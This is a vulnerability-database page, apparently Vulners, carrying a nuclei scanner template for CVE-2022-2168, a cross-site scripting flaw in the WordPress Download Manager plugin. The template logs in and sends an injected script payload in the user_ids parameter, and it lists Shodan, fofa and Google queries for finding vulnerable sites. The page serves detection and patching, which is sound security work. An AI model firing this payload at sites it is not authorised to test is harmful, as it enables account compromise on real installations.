Lucene search
K

WordPress Download Manager < 3.2.44 - Authenticated Cross-Site Scripting

🗓️ 29 Jun 2026 05:52:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 27 Views

WordPress Download Manager < 3.2.44 allows authenticated Cross-Site Scripting due to insufficient sanitization.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-2168
17 Jul 202211:15
attackerkb
Circl
CVE-2022-2168
17 Jul 202214:27
circl
CNNVD
WordPress plugin Download Manager 跨站脚本漏洞
17 Jul 202200:00
cnnvd
CNVD
WordPress Download Manager plugin cross-site scripting vulnerability
19 Jul 202200:00
cnvd
CVE
CVE-2022-2168
17 Jul 202210:36
cve
Cvelist
CVE-2022-2168 Download Manager < 3.2.44 - Reflected Cross-Site Scripting
17 Jul 202210:36
cvelist
EUVD
EUVD-2022-34453
3 Oct 202520:07
euvd
NVD
CVE-2022-2168
17 Jul 202211:15
nvd
OpenVAS
WordPress Download Manager Plugin < 3.2.44 XSS Vulnerability
18 Jul 202200:00
openvas
OSV
CVE-2022-2168
17 Jul 202211:15
osv
Rows per page
id: CVE-2022-2168

info:
  name: WordPress Download Manager < 3.2.44 - Authenticated Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The WordPress Download Manager plugin before version 3.2.44 does not properly sanitize and escape the user_ids parameter in the stats history dashboard. This allows authenticated attackers to perform Cross-Site Scripting attacks by injecting malicious JavaScript code.
  impact: |
    Authenticated administrators can inject malicious JavaScript via XSS in the user_ids parameter, potentially stealing session cookies or performing unauthorized administrative actions.
  remediation: |
    Update the WordPress Download Manager plugin to version 3.2.44 or later.
  reference:
    - https://wpscan.com/vulnerability/66789b32-049e-4440-8b19-658649851010/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2168
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-2168
    cwe-id: CWE-79
    epss-score: 0.0106
    epss-percentile: 0.60298
    cpe: cpe:2.3:a:w3eden:download_manager:*:*:*:*:free:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: w3eden
    product: download_manager
    fofa-query: body="wp-content/plugins/download-manager/"
    google-query: inurl:"/wp-content/plugins/download-manager/"
    shodan-query: html:"wp-content/plugins/download-manager/"
  tags: cve,cve2022,wp,wordpress,wp-plugin,xss,download-manager,authenticated,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/edit.php?post_type=wpdmpro&page=wpdm-stats&type=history&user_ids[]=1&"><script>alert('document_domain')</script> HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert('document_domain')</script>"
          - "No downloads found"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022039614f6679127acf5348cbea9457238018a3c57ec288fddad2f9d57b7697c4af022100d6673aaa44eaf4544e7ea4cd82fa9a5c9cf839f8fc0ec50c781a0caca55b35e5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 24.3
CVSS 3.16.1
EPSS0.0106
27